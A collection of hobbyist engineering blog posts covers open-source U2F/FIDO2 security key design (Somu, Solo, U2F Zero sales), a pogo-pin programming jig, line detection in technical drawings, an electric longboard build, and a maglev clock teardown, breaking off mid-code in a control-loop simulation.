Designing Somu, a tiny security key

Somu is the same technology as Solo, but in a tiny form factor that fits in your USB port. You can use Somu as a U2F or FIDO2 authenticator, which allows you to log in to websites and other services. The name is inspired by Tomu, which was the first open source key using this form factor.

The team at SoloKeys and I are planning to crowdfund Somu on Crowd Supply. If you’re interested, you can sign up to get an announcement when it’s available.


The PCB is a 1 mm thick 2-layer board with Z-axis milling. The milling makes the short tabs on the sides so the PCB can "slide fit" into the case.

The end of the circuit board is fully edge plated and makes 2 capacitive touch sensors, which act as the buttons. Right now there’s no use case for 2 buttons, so they will be used as one button. Maybe there will be a case in the future.

The case will be a relatively stiff rubber material so it will slightly flex around the PCB tabs and still be fine to plug into a USB port. Circuit components are on the bottom.


Judging from my rubber hardness sampler, Shore 90A *feels* about right. I also used this to help pick the case hardness for Solo.

I printed the circuit board and case. Circuit fits in case well. Circuit+case fit in USB-A port well. Next is to order real PCBs.

An interesting challenge with the PCBs is that the board is nearly one layer since you can only make very few vias without interfering with the USB traces.

And the components make a very tight fit. 1 MCU, 9 jelly beans, 1 RGB LED, 1 linear regulator. Plus two capacitive buttons, USB traces, and 4 test points. I was doubtful this would fit on a 10x11mm space on a "1.5" layer board but it does!

Since the components are all the same as on previous Solo models, and the routing is also largely the same, the same firmware can be used for all models. This keeps things simple.

I ordered the PCBs from PCBWay for about $250 since they support edge plating and Z-axis milling for their prototype service. Communicating the requirements was pretty straightforward, and I got the PCBs back in about 2 weeks.

I hand soldered all 20 PCBs that I ordered. It took some patience, but it’s for sending samples to reviewers while we run our Crowd Supply campaign. If you’re interested in reviewing (or anything else), let me know and I can send you a sample.

Just like Solo, Somu is open source and easy to develop for. It’s also a secure option to use as a security key! If you’re interested, check out Crowd Supply, or sign up to our announcement list.


3D printing a programming jig and embedding pogo pins

When using a microcontroller in a custom design, there's always a bit of a headache for me because I need to figure out a convenient way to break stuff out for programming and development.

Usually you can't afford to have the "plug and play" comfort of a development board on your custom board. And it's great to be able to break out more stuff than just the programming ports.

Here I explain an easy way to make a nice programming jig that can break out many signals for custom designs.

It is based on Eagle and Fusion 360 but you don't need to use those tools. The main things you need are:

Design your circuit

Here is the backside of my circuit.

I put little test ports on the back side for every signal that I potentially would like to break out. I didn't want to adhere to a 2.54 mm x 2.54 mm grid because that would strain the layout. I just made sure to keep them at least 1.27 mm apart from each other. It is pretty easy to break out signals this way, even when the layout is crowded.

Design the jig

Then, I exported my board from Eagle to Fusion 360 and took a minute to draw up a jig.

It's a pretty basic design. It just needs an outline to fit the circuit and a cutout so it's easy to get out. Since this is going to be 3D printed, you can go wild with your design.

Then, draw some circles where all the test pads are and cut them out of the jig. I just eyeballed everything and didn't need to take any measurements.

I also included the pogo-pin models from the manufacturer to make sure they fit right. These particular pins are nice because they are both solder-cup and spring loaded. The pitch is about 2.2 mm which is the smallest I could find. Thanks Mill-Max!

Print the jig

I printed the jig on my Form 2 printer. It came out well.

The relevant diameter on the pogo pin is 1.5 mm and it has a press-fit ring that is ~1.62 mm. I set my holes to be 1.61 mm and the pins press fit into them well. Your mileage may vary, so I recommend printing 2-3 different hole sizes at first.

Assemble the jig

The nice thing about solder-cup pogo pins is that they are really easy to solder.

I just soldered a wire to each one and plugged them into my jig.

The tedious part is matching the pinouts to your various programmers and UART cables.

Use the jig

Now for the exciting part.

It programs and... It blinks! First try!

I was able to design my jig to easily accommodate both my USB A and USB C designs.

All in all, I'm pretty pleased with this method and will do it again if needed. If you can recommend any improvements, let me know!

By the way, the design you see is my secure, two-factor authentication token, Solo!


Designing Solo, a new U2F/FIDO2 Token

For the past couple years, I’ve been selling U2F tokens on Amazon. I’ve been selling an average of 150 units per month and have ordered multiple batches over the past two years.

Due to recent developments with FIDO2, WebAuthn, and various features people have been requesting, I’ve started an upgrade for U2F Zero. A couple collaborators and I have decided to call it Solo (or Solo Key). It is the sole thing you need to secure your accounts :).

Update: Production for Solo has been funded by Kickstarter and we are live with sales :).

What is U2F or FIDO2?

U2F is a standard for two factor authentication. Many websites like Twitter, Google, Facebook, etc., support it. After you enter your password, you insert the token, press the button, and you're logged in. It provides very strong protection against account theft and phishing, much more than SMS or time-based codes.

FIDO2 is an upgrade to the U2F standard and is planned to have even more ubiquity. FIDO2 is planned to be used as a password replacement. On some services, like Windows 10, you can already use it in place of a password.

Solo

The original U2F Zero was just a plain circuit board that only did U2F over USB. Solo will have the following features.

  • USB-A and USB-C option
  • NFC support for mobile devices
  • Flexible + durable case that embeds a tactile button
  • Various color options
  • FIDO2 protocol support
  • Easy, web-based secure update process
  • Good documentation for everyday users

And of course, everything will soon be open sourced like with U2F Zero.

Design

Development started completely in software, no hardware, to make sure it could be easily contributed to by others. Most coding and testing can be done solely on a PC, while being designed to be easily ported to other chips, like the NRF52840 by Nordic Semiconductor and EFM32J by Silicon Labs.

PC-only testing is achieved by patching Yubico's FIDO2 Python API to exchange messages with a PC application instead of a USB HID device.

After verifying a "first draft" of the FIDO2 implementation, I ported the design to an NRF52840 development board and to a Silicon Labs EFM32J development board.

[Images: NRF52840 Bluetooth, NFC, USB SoC; EFM32J + EFM8UB1]

I ultimately decided to go with the EFM32J. It consumes less power, is much cheaper, and is easier to solder (QFN32 vs BGA). NRF52840 initially seemed like a great solution since it has everything in 1 chip, but it brings more complication and cost. Plus it would make it much harder for people to solder their own Solo key.

The design is modular in that USB and NFC support is added by adding another chip. The EFM8UB1 provides the USB HID interface, and the AMS 3955/3956 provides the passive NFC interface. NFC also requires a coil, which will be an external coil that lies flat next to the circuit, all inside the case. More on this later.

Hardware key isolation

Providing some sort of hardware isolation for secret key material is hard since most of the chips on the market that can do that require an NDA, and require that the company be a bank, government, or other reputable entity.

There are the ATECC508A and ATECC608A crypto chips, which can be obtained easily. U2F Zero actually uses the ATECC508A for key isolation and crypto acceleration. But since U2F/FIDO2 devices need to derive secret keys at runtime to be able to work with an unlimited number of services, the ATECC508A doesn’t work out well. This is because to derive a key at runtime, you typically need to compute an HMAC that’s keyed with a master secret, and store the result as the runtime key. This needs multiple interactions with the ATECC508A and requires the runtime key be stored temporarily on the MCU, which tarnishes the idea of key isolation.
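To make the runtime derivation described above concrete, here is a minimal sketch of deriving a per-service key with an HMAC keyed by a master secret. It assumes HMAC-SHA256 and hypothetical inputs (`app_id`, `nonce`); it is only an illustration of the general idea, not the actual scheme used by U2F Zero or Solo.

```python
import hashlib
import hmac


def derive_service_key(master_secret: bytes, app_id: bytes, nonce: bytes) -> bytes:
    """Derive a per-service key as HMAC-SHA256(master_secret, app_id || nonce)."""
    return hmac.new(master_secret, app_id + nonce, hashlib.sha256).digest()


# Hypothetical values for illustration only.
master_secret = bytes(range(32))   # on a real token this never leaves the device
app_id = hashlib.sha256(b"https://example.com").digest()
nonce_a = bytes(16)                # a real token would choose this at random
nonce_b = b"\x01" * 16

key_a = derive_service_key(master_secret, app_id, nonce_a)
key_b = derive_service_key(master_secret, app_id, nonce_b)
```

The same inputs always give the same key, so nothing per-service has to be stored on the token. The catch described above is that the HMAC output has to be handled somewhere as the runtime key.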

I’m not aware of any other attainable crypto chips that can do better than this.

It’s best to keep the design simple rather than lob in a security chip that isn’t a good fit. The main threat is adverse software on the computer you plug your token into. Solo’s firmware isn’t complex, so it is reasonable to try to avoid buffer overflows and similar exploits. If a critical bug is found, a signed update process is supported so it can easily be patched. This model generally works well in industry (Trezor, the popular bitcoin wallet, is successful with this approach) and greatly simplifies the design of Solo.

Hardware design

Previously I’ve only used KiCad for PCB layout, including for the design of U2F Zero. For Solo, I basically did a token design in KiCad, Eagle, and CircuitMaker to figure out what is best. I stuck with Eagle in the end because of the nice integration with Fusion 360, which really helps the mechanical design.

The case

We want our device to be something people like to use and carry around (unlike most 2FA options out there). So getting the look and feel of it right is important.

We have two designs for the case. One can be printed on a SLA printer ($2.50 from DirtyPCBs), and the other we are getting professionally molded. Both designs take advantage of a thin mechanical button that provides nice tactile feedback.

The additively manufactured design allows people to produce their own. It consists of a top and bottom piece that snap together over the circuit board. The bottom piece also removes the 2mm requirement for PCBs.

The molded design will be a semi-hard silicone “sock”. It will be pocket-friendly, nice to hold, and allow the embedded mechanical button to be used. Multiple colors can be offered.

The design is still being iterated on and current photos are from a 3D printer.

USB-C

Two versions of the PCB will be produced to support USB-A and USB-C connectors.

We will aim to re-use the same case for USB-A and USB-C.

NFC Support

For a long time, I thought passive NFC support wasn’t going to work out. The only MCUs out there that can run passively on an NFC interface, and communicate bidirectionally, are the aforementioned forbidden security chips. But there are a couple of chips out there that just provide an NFC interface and an energy harvesting capability.

The AMS 3956 is one good example. AMS 3956 is extra special because it allows for NFC type 4 emulation, a requirement for U2F/FIDO2. Other energy harvesting ICs, like the NXP NT3H2111, just implement NFC type 2.

It is also critical to use a low-power MCU to pair with the AMS 3956, like the silabs EFM32J, because the harvested NFC power is pretty low, around 3-5 mA at 3V in my tests.

It will still take more design effort to finish the NFC version. Some low level NFC communication details need to be implemented, and the coil needs to be designed and tuned.

Signed firmware updates through browser

Signed firmware updates are supported via an extension to the U2F/FIDO2 protocol. No extra software needs to be installed. In case any critical bugs are discovered, it will be very easy to update.

Users will be able to get any new features added by me or the community. Developers will be able to reprogram the firmware using a hardware debugger.

Updating is a matter of holding down the button and visiting a website

Kickstarter

We need some funding to be able to bootstrap this. To make this project affordable, i.e. reaching scale on both the PCBs and molded case designs, we would like to be able to order 10,000 units. We could get away with like 3000, but our numbers really start to look sustainable at 10,000.

A successful crowdfunding campaign would really help get this project on the market. We would need a minimum of 1000 backers, but we really start to shine if we can get around 4000. Assuming an average 2.5 “base” units per backer, we could reach our 10,000 units sold goal.

From there, we would be in a great place to continue working on making a great 2FA/1FA device for the masses.

Update: Our Kickstarter has ended; you can see the product version here.


Detecting lines on technical drawings

Over the past few months I've been working on a program to convert images of technical drawings into digital formats.

In other words, the program will convert an image like this.

Into a digital format that can be used in a CAD program.

Kicad

One of the basic necessities of such a program is that it needs to detect lines. I've been wanting to write a little about this.

Line Detection with OpenCV

Initially I thought about using some of the powerful OpenCV methods for detecting lines. OpenCV edge detection and Hough transforms are commonly used to detect lines. They would be great for detecting lines like the traffic lines in the following image.

I tried using this method for extracting lines from my drawing images but I don't think it works well enough.

Initially, it seems to work well.

Blue lines representing the detected lines are drawn over the image.

But on closer inspection, it has some issues.

Here it is missing some lines that I wish it detected.

Here it detected some lines that I wish it didn't.

I tried experimenting with the various parameters for edge detection and the Hough-transform line detection. I was able to make it better, but the number of missed lines and false positives is always significant.

I could try various amounts of post-processing and probably still make it work for my application, but I don't think it is a good solution. I think there are much easier methods that can take advantage of the properties of my input images.

For one, most technical drawing images are all just black lines and shapes with a white background. This separates them from most camera captured images, which are more suited for OpenCV's prowess.

Better line detection

Let's just focus on horizontal and vertical lines.

Remember an image is just an array of numbers. In my case, it is a black and white 2D image, with all the pixels basically being either 255 (white) or 0 (black).

Here is a sample image. There are two lines and one happens to be twice as wide as the other. I want to detect exactly two lines accurately.

How would you do it?

.

.

.

.

I took a simple signal processing approach. Sum the rows and columns and look for spikes.

First invert the image.

Sum the columns.

Sum the rows.

Detecting the lines then becomes as simple as setting a threshold.
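As a rough illustration of the invert, sum, and threshold steps above, here is a minimal sketch on a synthetic image. The image size, the `find_spikes` helper, and the threshold value are assumptions made up for this example. Consecutive indices above the threshold are grouped, so a line that is two pixels wide still counts as one line.

```python
import numpy as np

# Synthetic 20x20 test image: white (255) background, black (0) lines.
im = np.full((20, 20), 255, dtype=np.uint8)
im[5, :] = 0        # horizontal line, 1 pixel wide, at row 5
im[:, 12:14] = 0    # vertical line, 2 pixels wide, at columns 12-13

inverted = 255 - im                # lines become 255, background becomes 0
col_sums = inverted.sum(axis=0)    # one value per column
row_sums = inverted.sum(axis=1)    # one value per row


def find_spikes(sums, threshold):
    """Return (start, end) index pairs of consecutive entries above threshold."""
    above = np.concatenate(([False], sums > threshold, [False]))
    edges = np.flatnonzero(above[1:] != above[:-1])
    return [(int(s), int(e) - 1) for s, e in zip(edges[::2], edges[1::2])]


threshold = 0.5 * 255 * 20         # assumed: half the sum of a full-length line
horizontal = find_spikes(row_sums, threshold)   # rows that contain a line
vertical = find_spikes(col_sums, threshold)     # columns that contain a line
```

Each tuple gives the first and last index of one spike, so the thick line shows up as a single entry whose width is `end - start + 1`.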

I wouldn't stop there though. Input images can get pretty busy with a lot of overlapping lines and shapes. It might not be clear what threshold to use. Check out the row summation of a more realistic input image.

It is really easy to detect the larger lines but the smaller lines won't get picked up by a threshold because of the "noise floor."

So as an extra step the data should be run through a high-pass filter to remove the low frequency "noise."

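import numpy as np
import plotly.offline
from plotly.graph_objs import Scatter
from scipy import signal


def butter_highpass(cutoff, fs, order=5):
    # Design a Butterworth high-pass filter; cutoff is normalized to Nyquist.
    nyq = 0.5 * fs
    normal_cutoff = cutoff / nyq
    b, a = signal.butter(order, normal_cutoff, btype='high', analog=False)
    return b, a


def butter_highpass_filter(data, cutoff, fs, order=5):
    # filtfilt runs the filter forward and backward, so spikes are not shifted.
    b, a = butter_highpass(cutoff, fs, order=order)
    y = signal.filtfilt(b, a, data)
    return y


# im is the input image as a 2D numpy array (0 = black, 255 = white)

y1 = np.sum(im == 0, axis=0)              # black pixels per column (summed over rows)
y1f = butter_highpass_filter(y1, 1, 25)   # put through high pass filter

plotly.offline.plot([Scatter(y=y1)])      # I'm using Plotly to output graphs
plotly.offline.plot([Scatter(y=y1f)])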

The highpass data is overlaid in orange. This is a safer data-set to use for threshold detection.

You might be thinking that the lines aren't really detected all the way. We just figured out one dimension (X or Y) for each line. We don't know where each line starts or how long each line is.

Here are the so called detected horizontal and vertical lines.

But figuring out where the lines start and end is simply a matter of tracing each red line and looking for black pixels.
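The tracing step could look something like the sketch below: walk along one detected row (or column) and record where runs of black pixels begin and end. The `trace_segments` helper and its `min_length` parameter are hypothetical names for this example; `min_length` is an assumed way to ignore short crossings from perpendicular lines.

```python
import numpy as np


def trace_segments(pixels, min_length=2):
    """Return (start, end) index pairs for runs of black (0) pixels in a 1D strip."""
    black = np.concatenate(([False], np.asarray(pixels) == 0, [False]))
    edges = np.flatnonzero(black[1:] != black[:-1])
    runs = zip(edges[::2], edges[1::2])
    return [(int(s), int(e) - 1) for s, e in runs if e - s >= min_length]


# Synthetic example: a horizontal line on row 3 spanning columns 4..15,
# crossed further along by a vertical line at column 18.
im = np.full((10, 24), 255, dtype=np.uint8)
im[3, 4:16] = 0
im[:, 18] = 0

segments = trace_segments(im[3, :], min_length=3)
```

Here the single black pixel contributed by the vertical line is dropped, and the remaining run gives the start and end of the horizontal line.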

Detecting non-vertical, non-horizontal lines

For lines with slopes that aren't 0 or infinity, my previous method won't work. I still don't like using OpenCV edge detection and Hough transform for this.

I could do something like rotate the image 45 degrees and detect lines with slope of 1. That might be enough for the types of images I'm working with.

Maybe there's a better way. If you think of something, let me know and I'll owe you a beer.


Quick electric skateboard build

A friend and I recently decided to get electric longboards. Except most of them suck or are pretty expensive.

We figured maybe the DIY route wouldn't be too hard and we could make something pretty sweet.

I wanted to make mine by converting an existing longboard that I already had. That way I'd only need to get the electronics and figure out a way to connect the motor to the wheel. I also kind of optimized for making things easy and didn't want to spend a ton of time on this.

The electronics

The electronics are the easy part. You just need a motor, battery, speed controller, RF receiver, and remote. All of these are commodity RC "vehicle" components. I chose the following parts.

  • Motor
    • This has turned out pretty well, very powerful and robust. I chose a 380 KV motor which works out to a 20-30 miles/hr top speed at a 3:1 gear reduction. It's also small enough to fit under the skateboard deck.
  • Speed controller
    • Works fine and doesn't come close to overheating. Don't need the fan that comes with it. Can source up to 120A which is important to keep up with the motor's capability. I wish the programming options for the controller were better. There's just a simple programming card.
  • RF receiver + remote
    • I chose the cheapest thing. I couldn't really find a good "small" RF/TX remote kit. I'll probably redo the case/handle form factor at some point.
  • Battery
    • Large capacity and discharge capability. Also thin enough for skateboard.
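The top speed figure for the motor can be sanity-checked with a quick calculation. The 380 KV rating and 3:1 reduction come from the parts list above; the battery voltage (a 6S pack at 22.2 V nominal) and the 83 mm wheel diameter are assumptions for illustration, since neither is stated here. KV is RPM per volt with no load, so the real speed under load will be lower.

```python
import math


def top_speed_mph(kv, battery_volts, gear_reduction, wheel_diameter_m):
    """Estimate no-load top speed from motor KV (RPM per volt)."""
    motor_rpm = kv * battery_volts
    wheel_rpm = motor_rpm / gear_reduction
    meters_per_minute = wheel_rpm * math.pi * wheel_diameter_m
    return meters_per_minute * 60 / 1609.344   # meters per hour -> miles per hour


# Assumed values: 22.2 V battery and 83 mm wheels.
speed = top_speed_mph(kv=380, battery_volts=22.2, gear_reduction=3, wheel_diameter_m=0.083)
print(f"{speed:.1f} mph")
```

With these assumed numbers the estimate lands at roughly 27 mph, inside the 20-30 miles/hr range quoted for the motor.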

The mechanics

This was definitely the hard part. At first I thought it would be easy if I just used an "all in one" hardware kit from eBay. But they didn't really fit my skateboard trucks well and were really hard to get aligned with the wheel correctly. It was also really tough to get the custom pulley centered on the wheel and bolted in. And when I did get it bolted in, it wasn't perfectly centered and it was non-trivial to fix.

I decided to custom make the parts to fit my trucks and wheels. I'd need a custom bracket to fit the motor onto the trucks and a custom pulley to attach to the wheel. I'm not experienced with machining and don't have easy access to machining equipment but I do have a 3D printer. I decided to try making 3D printed nylon parts. Nylon is really tough, so maybe it'll work well.

It took some iterations to get right, but here they are.

The pulley pictured is in PLA but the final version was in nylon. It fits to my wheel nicely and I also printed a small dowel to temporarily connect it to the wheel's bearing hole, which keeps it centered while I drill holes for the bolts. I also got new trucks solely because the axle was relatively square, which made it much easier to mount the bracket to.

Here's everything put together.

After riding it for a while, I haven't noticed any problems with the nylon parts. I use the same timing belts that the Boosted Board uses and they fit snug in the custom pulley. The parts were printed at about 95% infill to get maximum strength.

Nuts and bolts used

The nylon motor bracket is held in place using 4-5 set screws. I left a ~5.7 mm hole in the 3D printed part and then tapped the hole by hand using an M6 tap. The set screws hold up surprisingly well in tapped nylon. (As a side-note, I've found that Kodiak is a pretty good brand to use on Amazon for taps, bits, endmills, etc.).

The pulley was bolted to the wheel using these nuts and bolts. It's important to use nylon insert lock nuts or they'll definitely come loose. They should also be corrosion resistant.

Improvements

The board works pretty well but there are some definite improvements to make.

Belt slippage

The current 15mm wide, 3mm pitch timing belt isn't enough to transfer the full torque of the motor. So if you apply enough throttle, the belt will slip. This isn't too much of a problem and these belts are designed to slip. It also acts as a torque limit to protect you from applying too much torque by accident and falling off.

But sometimes it's annoying when you're not accelerating as much as you'd like. And hills can sometimes be tough. I think the best way to solve this is to use two speed controllers and two motors for the two back wheels. Twice as much torque would be plenty. The Boosted Board also uses two motors.

Battery management

Battery management and protection is really important. Namely, you need to ensure none of the cells over-discharge, which can happen before the speed controller can detect the overall battery voltage going low. Over-current isn't as much of a problem since the speed controller will limit the overall current. But redundant protection isn't a bad thing to have.

It would also be nice to have a proper charging circuit. Right now I'm just using a special Li-ion battery charger that will charge and balance the cells. If I added a circuit to handle charging, I could just use a regular barrel jack or even a USB cable to charge it.

When I get around to this, I'll make another post.

DIY

If you're interested in making a similar build, hit me up! I'm happy to answer questions or share designs.


U2F Zero year in review

I wanted to share some details on the U2F Zero project now that it has been on the market for over a year. This is to give an idea of what to expect in terms of cost and profit from a "DIY-to-market" kind of project like this.

For those unfamiliar, U2F Zero is an open-source secure USB device used for two factor authentication. I made it back in 2016 and did a semi-large PCB-A run and sold them on Amazon.

At the time, I didn't really know what to expect. Were people actually going to buy these? Was I going to get bad reviews? Was someone going to find some security bug in the implementation (open-source)? Is the profit worth the effort? Now I can answer all of these questions.

Starting out

I started on U2F Zero because I wanted to work on something interesting and learn how to make a PCB. Here was my first one.

first PCB

It's poorly laid out. The traces don't give a crap about EMF. And what's a ground plane?

Eventually, I got better at it. The project even got an awesome pull request from Chris Pavlina, who is better at layout than I am.

Business plan

Eventually, I got the U2F Zero "minimum viable product," and it was ready to hit the market.

I basically guessed that the market would sustain 1000 units per year. So I put in an order of 1100 units to a Chinese PCBA fab (PCBCart) totaling about $4,000. The cost is made up of the PCB (~$0.22/unit), the assembly (~$0.44/unit) and the components (~$2.26/unit). All the costs scale with quantity. Had I ordered 3000 units, I would have saved about $0.35 for each U2F Zero. But the last thing you want is 2000 U2F Zeros that no one is buying sitting in a warehouse somewhere collecting Amazon storage fees.

I didn't want to deal with sales and distribution. I was in the middle of grad school and didn't have the time or the interest. So after manufacturing the tokens, I shipped them to Amazon to be fulfilled. This does come with a cost of about $1.02-$2.02 in fees per U2F Zero token sold by Amazon.

After manufacturing and distribution was handled, it was time to execute my elaborate market entry plan: write a blog post and post it to Hacker News and Twitter.

Sales

I spent almost a whole weekend drafting my U2F Zero post. I posted it... and it worked.

For the first month, the time between the Amazon shipment and the blog post, there were almost no sales. Then after the post, there was a spike of 207 sales over the following week. Then it balanced out to about 6-7 units per day. And 4 months later, they sold out.

There was even an increase in sales around Christmas time.

And people left mostly good reviews. I wasn't sure if people would leave good reviews since it's just a cheap token with no case. But it's very clear from the listing what it is. So most people will know what they are purchasing -- and as long as it does a good job fulfilling that image -- it has the potential for good reviews. I think that was an important takeaway.

I did get some negative feedback. Some customers didn't like that Firefox didn't support U2F at the time or that the token didn't come with instructions.

There was one technical review that tore U2F Zero to pieces. Amongst the issues the reviewer found, there was a privacy issue in my implementation. Not a critical security flaw, but something that would allow each U2F Zero to be uniquely identified when it is used. It was my mistake and there were roughly 1000 units out there with it. I ended up fixing it and am offering replacements for those that purchased an old token.

The reviewer kindly took to opening issues on Github and even updated his review after the firmware issues were fixed.

Profits

As mentioned previously, each token cost about $3.00 to make. But when accounting for the cost of prototyping, packaging, labeling, import taxes, tools, and holding 100 units in stock, the unit cost is really about $4.18. There was about $2.02 in fees from Amazon. The listing price was $8.00. So that works out to be roughly $2k in profit over 4 months, which is about a 42% ROI. Not a drop-out-of-school kind of haul by any means, but it was a great experience for me and I hope to make similar ventures in the future.

For those interested, I'll list the various costs here.

  • PCBs: $351.10
  • Assembly + components: $3,062.85
  • Shipping: $59.72
  • Tariffs (from China to U.S.): $126.32
  • Labels: $13.98
  • Polybags: $63.25
  • Tools: $164.94
  • Prototyping: ~$350.00
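The listed costs can be added up to reproduce the per-unit and ROI figures. This is a back-of-the-envelope sketch: it assumes 1000 units sold (1100 ordered, 100 held in stock) and applies the $2.02 Amazon fee to every unit, which are simplifications rather than exact accounting.

```python
costs = {
    "PCBs": 351.10,
    "Assembly + components": 3062.85,
    "Shipping": 59.72,
    "Tariffs": 126.32,
    "Labels": 13.98,
    "Polybags": 63.25,
    "Tools": 164.94,
    "Prototyping": 350.00,
}

units_sold = 1000      # assumed: 1100 ordered, 100 held back
price = 8.00           # listing price per unit
amazon_fee = 2.02      # assumed to apply to every unit sold

total_cost = sum(costs.values())
unit_cost = total_cost / units_sold
profit = units_sold * (price - amazon_fee) - total_cost
roi = profit / total_cost

print(f"total ${total_cost:.2f}, unit ${unit_cost:.2f}, profit ${profit:.2f}, ROI {roi:.1%}")
```

Under these assumptions the total comes to $4,192.16, or about $4.19 per unit sold, with a profit a little under $1,800 and an ROI between 42% and 43%. That is consistent with the rounded figures above.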

Other opportunities and events

There were some cool unexpected things that happened as a result of U2F Zero. A lot of awesome people reached out or shared how they made their own U2F Zero(s) or purchased them on Amazon.

One of them was Landon Greer, who helped organize an infosec conference and made custom U2F Zeros as a conference badge. Later, the Crypto & Privacy Village at Defcon forked the U2F Zero design and included it in their unofficial 2016 Defcon badge.

More recently, the Association for Computers Professionals in Education (ACPE) made a custom order for 400 units and invited me to come spend some time in Oregon and speak at their conference. I really enjoyed it. It was great to learn about a different field and meet new people.

U2F Zero, round 2

A few months after selling out, I decided to do another run. This time I added some improvements to the PCB layout and fixed issues in the firmware. I also decided to order 3000 this time (saved that $0.35 per unit) and support markets in Canada, U.K., and Europe. I think the U2F standard is picking up in popularity so the U2F demand shouldn't go away. I'm curious to see how U2F Zero sales differ between different countries.

At the time of this writing, I've sent 1500 units to the U.S. marketplace, 300 to Canada, 300 to the U.K., and 100 to a distributor in Switzerland that will handle shipments to other countries in Europe. I've kept the rest in storage so I can replenish a marketplace easily if inventory gets low.

U2F Zero has been back on the U.S. market for about 4 months now, after being out of stock for about 6 months. Sales slowly picked back up and average about 5 units per day currently.

My goal is to keep the supply up with minimal effort and not have any more gaping out-of-stock periods. In the meantime, I can work on the next project.

Thanks!

Thank you to everyone that has taken an interest in U2F Zero and to those that have contributed to the open source project so far:

Thank you to everyone that supported U2F Zero and made this possible. I've learned a lot since first making this crappy first prototype and will have more projects to launch later.


Designing a clock with levitating arms (part 1)

At some point I developed an interest in magnetic levitation. And I decided to make a clock with levitating arms. I thought it would be a great opportunity to get some more analog circuit experience. It would also be a pretty cool project to show off. Maybe even a Kickstarter.

At the time, I figured maybe it wouldn't be too hard. There are plenty of magnetic levitating consumer products out there. I could just take a reference design and tweak it to my needs.

It can't just be any maglev circuit though. It should be able to levitate a magnet in any orientation, so you can leave it on a table or hang it on a wall. Typical maglev circuits work by turning on and off one electromagnet continuously to balance a levitating magnet against gravity. In other words, there is one electromagnet that controls the Z axis position. If gravity is perpendicular to the electromagnet's axis (like when hanging the clock on the wall), then the typical maglev circuit won't be able to counter gravity anymore.

I'm not aware of many consumer products that handle "horizontal" levitation, but I did find this product which can. It comes from some Chinese company which develops "EZ Float Technology." I went ahead and ordered one.


The Reference Design Teardown

I tried out EZ Float Technology and it works quite well. I wasn't able to get it to levitate horizontally in one step, but rather had to start it in the vertical position and carefully tilt it up to what you see in the picture. Once stable, it only consumes about one watt of power, and up to twelve watts otherwise.

And interestingly, in the vertical position, the magnet holds about a pound of weight without consuming any additional power -- how could that work?

It's a pretty cool product and is close to what I would need to make my clock. I would just need to figure out how to shrink the design, as the current magnet is way too big.

Let's see how it works.

Taking the lid off, you see two components that every maglev design needs: electromagnets and sensors. The electromagnets push or pull the levitating magnet in a controlled loop to keep it centered. The control loop is given input by the sensors.

There are a few important design characteristics you can see immediately.

There's a big ring magnet. At first I wasn't sure why that was there but it soon became obvious. The ring magnet polarity keeps the levitating magnet from falling toward the PCB. The levitating magnet can only move to the sides, or in the X and Y direction. This is how it can hold additional weight without consuming more power.

This leads to the next characteristic. There are four electromagnets. These are for aligning the magnet in the X and Y direction. They don't contribute to Z direction control at all (and don't need to). In a conventional maglev circuit, only the Z axis is accounted for. By adding another axis, you would think you would need one more magnet (not 3 more). But in this kind of configuration, there is no symmetrical arrangement that can balance both the X and Y axes using 2 magnets. So there are 4.

Guess how many electromagnets there really are? Turns out, you can argue there are only two. Each diagonal pair of coils is connected in series. So from a circuit perspective, there are only two coils/electromagnets to drive. So my previous point about there needing to be a minimum of 4 electromagnets to maintain control and symmetry is a bit misleading. Since there are only two coils to drive, it is much easier to control them, using one control loop each.

But if the coils are connected in series, isn't that just producing the same force on both sides, which cancels out? Not if you switch the polarity of one of them. So a "pulling" force on one corner produces a "pushing" force on the opposite corner. Clever!

On the back side of the PCB are some opamps and H-bridges. More or less what you would expect for a typical maglev circuit, but cut-and-paste twice to handle X and Y control. There are some bidirectional switches as well, which handle changing the electromagnets to run in both forward and reverse.

My first attempt

I made a circuit using op-amps, filters, and a couple H-bridges. I simulated it and it did what I expected it to, but there is still a decent amount of uncertainty of what parameters would be best for levitation stability. So I included a lot of potentiometers. Pots for tuning the filtering, the gain, and of course, the reference sensor value representing where the center is.

I breadboarded this monstrosity.

I tested the circuit using a single Z-axis to start and it worked.

But it didn't work well at all when using a ring magnet and four electromagnets. I made a few mistakes, fixed them, and even laid out a board and screwed electromagnets onto the PCB to make a mechanically stable platform with plenty of pots that would hopefully allow me to converge on the magical control loop parameter solution.

PCB with added flyback diodes and incorrect screw terminal footprint.

But it wasn't working. It would levitate for a brief moment, and then oscillate out of control. Every time.

There were a number of problems contributing to this.

Electromagnets caused unwanted feedback in the sensors

The sensors are supposed to respond to the position of the magnet and be indifferent to what the electromagnets are doing. Since the sensors are hall effect sensors and respond to any magnetic field, this can be tricky.

One good solution is you place the sensor so it is parallel with the flux lines of the electromagnets and thus picks up zero interference. Only when the levitating magnet moves off-center, will its flux lines have a component perpendicular to the sensor, thus causing a response.

If that is hard to picture, it is okay, I made an MS Paint illustration.

Note how the electromagnet flux lines are nearly parallel with the sensor whereas the levitating magnet flux lines are more perpendicular to it.

I designed my sensors to sit at about half the height of my electromagnets. However, this wasn't good enough. It's hard to estimate the exact center of the sensor and the center of the flux lines on a home brew electromagnet. So there was always a significant amount of interference.

I solved this by using a standoff as the electromagnet core and putting a set screw in it. This allowed me to offset the center of the flux lines by moving the set screw up and down within the standoff core. It works pretty well.

I'm bad at control loops

Admittedly, this was the bigger reason my circuit didn't work. When the levitating magnet oscillates out of control, it is mostly due to overshoot. Basically, if the magnet is off center by 1 mm, it will get pushed over to -1.2 mm, and then to 1.5 mm, and then -1.9 mm, and then 2.6 mm, and then WHAM. It slams into the side of the ring magnet. This kills the ring magnet.

The solution to overshoot is to subtract away a component of the derivative of the position (i.e. the velocity). So when the magnet gets from 1 mm to 0.2 mm, it is going faster and the controls should start pushing the opposite way to slow it down in anticipation of overshoot.

This should be familiar to those that have worked with PID loops. The P (proportional) term corresponds to the control loop just responding based on how far away the magnet is from the center. The D (derivative) term is the counter to overshoot. The I (integral) term isn't needed for my system but it's good to research it if you don't know it.
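To make the overshoot argument concrete, here is a minimal simulation sketch in Python. It is not the Teensy code and does not model the real hardware: the magnet mass, the destabilizing stiffness from the ring magnet, the coil lag, the gains, and the time step are all made-up illustrative values, and `simulate` and `peak` are hypothetical helper names. It only shows the general idea that a lagging, P-only loop lets the swings grow, while adding a D term on the velocity damps them.

```python
def simulate(kp, kd, steps=10_000, dt=1e-4):
    """Return the magnet's lateral position (m) at every time step."""
    mass = 0.01        # kg, levitating magnet (assumed)
    k_unstable = 5.0   # N/m, ring magnet pushing the magnet off-center (assumed)
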